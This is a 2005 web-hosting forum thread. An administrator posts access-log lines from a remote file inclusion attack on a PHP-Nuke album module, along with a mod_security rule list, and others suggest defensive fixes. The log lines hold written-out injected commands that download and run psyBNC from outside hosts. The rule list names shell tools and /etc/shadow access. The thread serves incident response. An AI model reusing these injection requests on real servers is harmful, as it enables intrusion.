Community Forums
Connect with us on LinkedIn
Community Notice
+ Reply to Thread
Results 1 to 7 of 7
  1. #1
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19

    Default server hacked

    Hello,

    today my server hacked,
    201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    i have modsec.user.conf, but is not help. Why?

    # Require HTTP_USER_AGENT and HTTP_HOST in all requests
    # SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

    # Require Content-Length to be provided with
    # every POST request
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"

    # Don't accept transfer encodings we know we don't handle
    # (and you don't need it anyway)
    SecFilterSelective HTTP_Transfer-Encoding "!^$"

    # Protecting from XSS attacks through the PHP session cookie
    SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

    SecFilter "viewtopic\.php\?" chain
    SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

    # Block various methods of downloading files to a server
    SecFilterSelective THE_REQUEST "wget "
    SecFilterSelective THE_REQUEST "lynx "
    SecFilterSelective THE_REQUEST "scp "
    SecFilterSelective THE_REQUEST "ftp "
    SecFilterSelective THE_REQUEST "cvs "
    SecFilterSelective THE_REQUEST "rcp "
    SecFilterSelective THE_REQUEST "telnet "
    SecFilterSelective THE_REQUEST "ssh "
    SecFilterSelective THE_REQUEST "echo "
    SecFilterSelective THE_REQUEST "links -dump "
    SecFilterSelective THE_REQUEST "links -dump-charset "
    SecFilterSelective THE_REQUEST "links -dump-width "
    SecFilterSelective THE_REQUEST "links http:// "
    SecFilterSelective THE_REQUEST "links ftp:// "
    SecFilterSelective THE_REQUEST "links -source "
    SecFilterSelective THE_REQUEST "mkdir "
    SecFilterSelective THE_REQUEST "cd /tmp "
    SecFilterSelective THE_REQUEST "cd /var/tmp "
    SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


    # WEB-ATTACKS ps command attempt
    SecFilterSelective THE_REQUEST "/bin/ps"

    # WEB-ATTACKS /bin/ps command attempt
    SecFilterSelective THE_REQUEST "ps\x20"

    # WEB-ATTACKS wget command attempt
    SecFilter "wget\x20"

    # WEB-ATTACKS uname -a command attempt
    SecFilter "uname\x20-a"

    # WEB-ATTACKS /usr/bin/id command attempt
    SecFilter "/usr/bin/id"

    # WEB-ATTACKS id command attempt
    SecFilter "\;id"

    # WEB-ATTACKS echo command attempt
    SecFilter "/bin/echo"

    # WEB-ATTACKS kill command attempt
    SecFilter "/bin/kill"

    # WEB-ATTACKS chmod command attempt
    SecFilter "/bin/chmod"

    # WEB-ATTACKS chgrp command attempt
    SecFilter "/chgrp"

    # WEB-ATTACKS chown command attempt
    SecFilter "/chown"

    # WEB-ATTACKS chsh command attempt
    SecFilter "/usr/bin/chsh"

    # WEB-ATTACKS tftp command attempt
    SecFilter "tftp\x20"

    # WEB-ATTACKS /usr/bin/gcc command attempt
    SecFilter "/usr/bin/gcc"

    # WEB-ATTACKS gcc command attempt
    SecFilter "gcc\x20-o"

    # WEB-ATTACKS /usr/bin/cc command attempt
    SecFilter "/usr/bin/cc"

    # WEB-ATTACKS cc command attempt
    SecFilter "cc\x20"

    # WEB-ATTACKS /usr/bin/cpp command attempt
    SecFilter "/usr/bin/cpp"

    # WEB-ATTACKS cpp command attempt
    SecFilter "cpp\x20"

    # WEB-ATTACKS /usr/bin/g++ command attempt
    SecFilter "/usr/bin/g\+\+"

    # WEB-ATTACKS g++ command attempt
    SecFilter "g\+\+\x20"

    # WEB-ATTACKS bin/python access attempt
    SecFilter "bin/python"

    # WEB-ATTACKS python access attempt
    SecFilter "python\x20"

    # WEB-ATTACKS bin/tclsh execution attempt
    SecFilter "bin/tclsh"

    # WEB-ATTACKS tclsh execution attempt
    SecFilter "tclsh8\x20"

    # WEB-ATTACKS bin/nasm command attempt
    SecFilter "bin/nasm"

    # WEB-ATTACKS nasm command attempt
    SecFilter "nasm\x20"

    # WEB-ATTACKS /usr/bin/perl execution attempt
    SecFilter "/usr/bin/perl"

    # WEB-ATTACKS perl execution attempt
    SecFilter "perl\x20"

    # WEB-ATTACKS nt admin addition attempt
    SecFilter "net localgroup administrators /add"

    # WEB-ATTACKS traceroute command attempt
    SecFilter "traceroute\x20"

    # WEB-ATTACKS ping command attempt
    SecFilter "/bin/ping"

    # WEB-ATTACKS netcat command attempt
    SecFilter "nc\x20"

    # WEB-ATTACKS nmap command attempt
    SecFilter "nmap\x20"

    # WEB-ATTACKS xterm command attempt
    SecFilter "/usr/X11R6/bin/xterm"

    # WEB-ATTACKS X application to remote host attempt
    SecFilter "\x20-display\x20"

    # WEB-ATTACKS lsof command attempt
    SecFilter "lsof\x20"

    # WEB-ATTACKS rm command attempt
    SecFilter "rm\x20"

    # WEB-ATTACKS mail command attempt
    SecFilter "/bin/mail"

    # WEB-ATTACKS mail command attempt
    SecFilter "mail\x20"

    # WEB-ATTACKS /bin/ls command attempt
    SecFilterSelective THE_REQUEST "/bin/ls"

    # WEB-ATTACKS /etc/inetd.conf access
    SecFilter "/etc/inetd\.conf" log,pass

    # WEB-ATTACKS /etc/motd access
    SecFilter "/etc/motd" log,pass

    # WEB-ATTACKS /etc/shadow access
    SecFilter "/etc/shadow" log,pass

    # WEB-ATTACKS conf/httpd.conf attempt
    SecFilter "conf/httpd\.conf" log,pass

    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup" log,pass

    #PHP-NUKE spam filter
    SecFilter "name=WebMail"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp;"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp"

    #PHP-NUKE web attack
    SecFilter "cd%20/tmp"

    #PHP-NUKE web attack
    SecFilter "chmod%204777"

    # phpbb2 shell exploit
    SecFilter "rush="
    SecFilter "highlight=%2527"
    SecFilter "highlight=%2725"
    SecFilter "highlight=%27"

  2. #2
    Member linux-image's Avatar
    Join Date
    Jun 2004
    Location
    India
    Posts
    1,185
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    check if LoadModule is active at the httpd.conf.

  3. #3
    Member sh4ka's Avatar
    Join Date
    May 2005
    Posts
    433

    Default

    You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

    Is your Mod security installed from the Add on in WHM ??

  4. #4
    Member neta5's Avatar
    Join Date
    Oct 2005
    Posts
    34

    Default

    you mean its better that we Turn on these item?
    BitchX
    bnc
    eggdrop
    generic-sniffers
    guardservices
    ircd
    psyBNC
    ptlink
    services

  5. #5
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19

    Default

    Quote Originally Posted by linux-image
    check if LoadModule is active at the httpd.conf.
    Active, it problem with filtring of mod_secure.

    In audit_log (Log of mod_secure), all for example "wget" denied with code 406.

  6. #6
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19

    Default

    Quote Originally Posted by sh4ka
    You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

    Is your Mod security installed from the Add on in WHM ??

    Yes, installed from WHM.
    I Activated all process listed on "background process killer". Thanks!

  7. #7
    Member
    Join Date
    Aug 2005
    Posts
    42

    Default

    The file got dropped by way of curl, so better put

    SecFilterSelective THE_REQUEST "curl "

    into mod_security's conf file

    as that will also stop other non detected drops

Similar Threads & Tags
Similar threads

  1. my server is hacked
    By jcaldera in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 05-02-2009, 04:23 PM
  2. server has been hacked
    By aracrew in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 01-21-2008, 06:55 PM
  3. Server get hacked
    By vishwas in forum cPanel and WHM Discussions
    Replies: 5
    Last Post: 12-02-2005, 04:49 AM
  4. my server got hacked?
    By goodgbb in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 08-25-2005, 10:18 AM
  5. new server got hacked
    By brumie in forum cPanel and WHM Discussions
    Replies: 24
    Last Post: 04-29-2004, 01:00 PM
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube